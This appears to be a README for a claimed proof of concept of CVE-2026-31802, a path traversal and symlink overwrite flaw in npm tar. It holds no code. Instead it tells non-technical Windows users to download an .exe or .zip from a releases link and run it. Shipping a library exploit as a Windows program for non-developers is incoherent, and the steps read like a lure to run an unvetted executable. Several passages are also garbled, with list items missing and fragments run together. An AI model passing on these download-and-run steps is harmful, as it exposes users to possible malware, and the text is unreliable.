
Demonstrate and analyze the CVE-2026-31802 path traversal vulnerability in npm tar, enabling arbitrary file overwrite via symlink extraction.
This repository provides a proof of concept (PoC) and write-up for CVE-2026-31802. The issue is a security vulnerability in the npm tar package. It allows attackers to trick the software into writing files outside its allowed folder by abusing symbolic links and path traversal.
This can lead to overwriting important files on your computer without your permission. Understanding and testing this vulnerability can help improve security. This project shows how the vulnerability works and helps security researchers verify fixes.
To run this software on a Windows machine, make sure your system meets these requirements:
No programming or developer tools are necessary. Anyone who can use a web browser and run simple programs can follow these steps.
The download is not a single file but a releases page. Follow these steps carefully:
Visit the Releases Page
Click the badge above or go directly to this link:
https://github.com/Recorded-texteditor120/CVE-2026-31802/releases
Find the Latest Version
On the releases page, look for the latest release. It usually appears at the top of the list and includes the date.
Download the Correct File
Click on the file that fits Windows most likely with an .exe or .zip extension. If unsure, choose .exe to make installation easier.
Store the File
Save the file in a known folder such as Downloads or Desktop.
If you downloaded an .exe file:
.exe file where you saved it.If you downloaded a .zip file:
.zip file and select "Extract All"..exe) to launch.This application works as a demonstration tool to show how the vulnerability operates.
The interface will guide you with simple buttons and text boxes. No programming skills are required. Follow the on-screen instructions carefully.
The software replicates the security flaw in the npm tar module.
This behavior highlights why the vulnerability is serious and needs a fix.
Check the releases page regularly for updates:
https://github.com/Recorded-texteditor120/CVE-2026-31802/releases
Download and install new versions the same way you got the first one. Updates may include bug fixes, security patches, or usability improvements.
The software is for educational and testing purposes only. Its goal is to help improve security awareness and fixes for this specific npm tar weakness.
The repository includes detailed documentation on the vulnerability, the exploit method, and the testing process. Feel free to read the included files for deeper understanding.
The project covers:
These terms relate to the nature of the vulnerability and the fields involved.